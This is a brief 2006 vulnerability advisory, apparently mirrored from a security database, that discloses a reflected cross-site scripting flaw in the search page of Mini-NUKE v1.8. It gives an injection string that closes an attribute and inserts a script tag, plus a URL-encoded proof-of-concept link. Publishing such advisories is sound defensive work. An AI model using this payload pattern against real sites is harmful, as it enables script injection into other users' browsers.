Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11953
HistoryMar 27, 2006 - 12:00 a.m.

Mini-NUKE v1.8

2006-03-2700:00:00
vulners.com
6

=> Mini-NUKE v1.8

=> Autore: SpiderZ
=> sito: www.spiderz.tk
=> Attacco: XSS
=> file: Search.asp


Url:

http://www.sito.com/search.php[script][/script]

Script:

nrw&la=">><script>alert("Xss by SpiderZ")</script>

Risultato:

http://www.sito.com/search.asp?search=nrw&#37;26la&#37;3D&#37;22&#37;3E&#37;3E&#37;3Cscript&#37;3Ealert&#37;28&#37;22Xss+by+SpiderZ&#37;22&#37;29&#37;3C&#37;2Fscript&#37;3E

www.spiderz.tk [2006]